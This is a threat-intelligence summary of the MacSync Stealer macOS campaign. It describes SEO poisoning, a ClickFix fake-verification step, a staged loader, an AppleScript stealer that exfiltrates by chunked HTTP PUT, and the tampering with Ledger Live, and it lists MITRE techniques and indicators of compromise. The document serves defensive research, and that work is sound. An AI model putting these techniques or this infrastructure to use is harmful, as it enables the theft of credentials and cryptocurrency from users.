.png "MacSync Stealer: SEO Poisoning and ClickFix-Based macOS Malware Delivery Chain")
CloudSEK researchers uncovered a multi-stage macOS campaign that uses SEO poisoning and ClickFix-style social engineering to trick users into running a malicious Terminal command which installs a staged loader and an AppleScript information stealer. The malware harvests browser credentials, cryptocurrency wallets, SSH keys, cloud configs and files, exfiltrates data via chunked HTTP PUT to attacker infrastructure, and can modify Ledger Live to enable transaction manipulation and persistence. #MacSyncStealer #LedgerLive
Keypoints
- Initial access is achieved via SEO poisoning: malicious search results for PDF downloads redirect victims to a fake verification page that instructs them to run a Terminal command.
- The user-run command decodes and pipes a remote script into zsh, launching a staged loader that executes further payloads in memory to evade static detection.
- The final payload is an AppleScript-based information stealer (MacSync Stealer) that harvests browser credentials, extension data (crypto wallets), keychains, SSH keys, cloud configs, and targeted file types from user folders.
- Stolen data is compressed into /tmp/osalogging.zip and exfiltrated to attacker-controlled infrastructure using chunked HTTP PUT uploads with API-key authentication headers.
- The campaign specifically targets desktop and browser cryptocurrency wallets (including Ledger Live) and can replace internal application components (app.asar, Info.plist) and re-sign the application to maintain long-term financial persistence and enable transaction tampering.
- Infrastructure and artifacts tied to the campaign include domains (bracesarlington.com, datacloudhost4.baby, allfile.me, b.mou.ir), a persistent API key token, temporary archive paths, and a public analysis repository on GitHub for defensive research.
MITRE Techniques
- [T1189 ] Drive-by Compromise β SEO poisoning is used to present malicious search results and redirect victims to a fake verification page: βThe infection chain begins with SEO poisoning targeting users searching for downloadable PDF versions of books.β
- [T1204 ] User Execution β Social engineering (ClickFix-style fake verification) persuades users to open Terminal and execute a malicious command: βThe page displayed a fake human verification screen β¦ instructing them to open Terminal and execute a command.β
- [T1059.006 ] AppleScript β The loader retrieves and executes AppleScript payloads to perform data collection and remote instructions: βThe response contains the core AppleScript malware responsible for data collection.β
- [T1059 ] Command and Scripting Interpreter β The attack uses zsh and piping remote scripts into the shell to execute code: ββ¦pipes it directly into zsh for execution.β
- [T1027 ] Obfuscated Files or Information β Payloads are embedded as Base64 and gzip-compressed content to evade static analysis: βThe second-stage script retrieved from the attacker infrastructure contains an embedded payload encoded in Base64 and compressed using gzip.β
- [T1560.001 ] Archive Collected Data β Collected artifacts are compressed into a ZIP archive before exfiltration: βCollected data is compressed into an archive:/tmp/osalogging.zipβ
- [T1041 ] Exfiltration Over C2 Channel β The archive is uploaded to the command-and-control server using chunked HTTP PUT requests: βthe archive is uploaded to the command-and-control server using chunked HTTP PUT requestsβ
- [T1555.003 ] Credentials from Web Browsers β The malware enumerates browser profiles and extracts Login Data, cookies, key4.db, logins.json, and extension IndexedDB storage to steal credentials and wallet data: βThe malware enumerates browser profile directories for Chromium-based browsers β¦ and Gecko-based browsers (Firefox). It targets files such as: Login Data β¦ key4.db β¦ logins.json β¦β
- [T1574 ] Hijack Execution Flow (application modification) β The campaign modifies Ledger Live application components (app.asar, Info.plist) and re-signs the binary to enable persistent manipulation: βthe application is re-signed using: codesign -f -s -β
Indicators of Compromise
- [Domain ] attacker C2 and download hosts β bracesarlington.com, datacloudhost4.baby, and 2 more domains (allfile.me, b.mou.ir)
- [URL ] SEO-poisoned redirect and fake verification pages β https://allfile.me/loading/?t=Inspired%20%20How%20To%20Create%20%20Products%20Customers%20Love%20%20English%20Edition, https://b.mou.ir/renhancef/84974J166D/β¦ (poisoned search result)
- [File Path ] temporary archive and staging folders used by the malware β /tmp/osalogging.zip, /tmp/sync* (staging and compressed exfiltration archive)
- [Filename ] malicious installer artifact referenced in the social-engineering page β hidenn-gift.application/macOsAppleApicationSetup421415.dmg
- [Header / API Key ] request authentication token observed in C2 communication β api-key: 5190ef1733183a0dc63fb623357f56d6
- [Application Path ] targeted wallet application path and modified components β /Applications/Ledger Live.app (replaced components: app.asar, Info.plist)
- [Repository ] public analysis/resource used for research β https://github.com/m1r3dk/macsync-stealer-analysis